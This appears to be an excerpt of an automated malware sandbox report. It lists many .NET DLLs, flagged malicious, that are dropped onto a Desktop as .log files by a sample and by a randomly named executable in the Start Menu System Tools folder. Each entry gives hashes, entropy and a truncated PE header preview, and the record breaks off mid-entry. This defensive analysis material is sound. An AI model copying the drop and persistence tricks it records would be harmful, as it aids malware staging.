                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\adhyQtRa.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.492504448438552
                                                        Encrypted:false
                                                        SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                        MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                        SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                        SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                        SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\agYrTKhn.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38400
                                                        Entropy (8bit):5.699005826018714
                                                        Encrypted:false
                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                        MD5:87765D141228784AE91334BAE25AD743
                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\bFkGxfJW.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34304
                                                        Entropy (8bit):5.618776214605176
                                                        Encrypted:false
                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\bIzZYPGT.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38400
                                                        Entropy (8bit):5.699005826018714
                                                        Encrypted:false
                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                        MD5:87765D141228784AE91334BAE25AD743
                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\bOHGhRcS.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.492504448438552
                                                        Encrypted:false
                                                        SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                        MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                        SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                        SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                        SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\bVwqfKcL.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33280
                                                        Entropy (8bit):5.634433516692816
                                                        Encrypted:false
                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\baJGltgV.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):294912
                                                        Entropy (8bit):6.010605469502259
                                                        Encrypted:false
                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                        C:\Users\user\Desktop\cITPDfAk.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23552
                                                        Entropy (8bit):5.529329139831718
                                                        Encrypted:false
                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\cKWbBtXG.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):294912
                                                        Entropy (8bit):6.010605469502259
                                                        Encrypted:false
                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                        C:\Users\user\Desktop\cZaiSBtn.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33280
                                                        Entropy (8bit):5.634433516692816
                                                        Encrypted:false
                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\ccSQbSYJ.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34816
                                                        Entropy (8bit):5.636032516496583
                                                        Encrypted:false
                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\cehiCBVH.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):36352
                                                        Entropy (8bit):5.668291349855899
                                                        Encrypted:false
                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\dHXpSOOR.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):64000
                                                        Entropy (8bit):5.857602289000348
                                                        Encrypted:false
                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\dKlIuyLO.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34816
                                                        Entropy (8bit):5.636032516496583
                                                        Encrypted:false
                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\dQWYMfTH.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\eHNQPyaJ.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33792
                                                        Entropy (8bit):5.541771649974822
                                                        Encrypted:false
                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\eSpQDyfl.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):5.645950918301459
                                                        Encrypted:false
                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\eTWARqDK.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23552
                                                        Entropy (8bit):5.529329139831718
                                                        Encrypted:false
                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\eTYoXqRT.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):36352
                                                        Entropy (8bit):5.668291349855899
                                                        Encrypted:false
                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\eWPiaGig.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\eeFyxBcE.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
